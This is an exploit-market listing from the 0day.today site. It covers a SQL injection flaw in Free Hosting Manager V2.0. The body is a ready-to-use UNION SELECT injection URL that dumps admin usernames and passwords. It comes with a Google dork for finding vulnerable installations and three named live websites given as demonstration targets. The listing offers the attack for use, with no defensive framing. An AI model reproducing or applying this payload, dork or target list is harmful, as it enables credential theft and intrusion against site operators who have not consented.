[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Free Hosting Manager V2.0 SQL Injection Vulnerability

Author
Spiral
Risk
[
Security Risk High
]
0day-ID
0day-ID-19820
Category
web applications
Date add
29-11-2012
Platform
php
####
# Exploit Title: Free Hosting Manager V2.0 SQL Injection Vulnerability
# Author: Spiral
# E-mail: for-hacker@hotmail.com
# Google Dork: inurl:clients/packages.php?id=1
# Tested on: [Windows 7]
# Vendor: http://www.fhm-script.com/download.php
####
  
  
# Exploit:
  
http://www.site.com/clients/viewaccount.php?id=[SQL]

http://www.site.com/clients/packages.php?id=-1'+UNION+ALL+SELECT+1,CONCAT(username,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+adminusers%23

# Note: you must regsiter first !

# Demoz:
1- http://ghsites.net/clients/viewaccount.php?id=1'
2- http://yarahost.org/clients/viewaccount.php?id=1'
3- http://zaghost.us/order/clients/viewaccount.php?id=1'
 
# Greetz 2: alh7nooty | b0x | j0rd4n14n.r1z | dzx | security999 | tnt_hacker

#  0day.today [2024-12-25]  #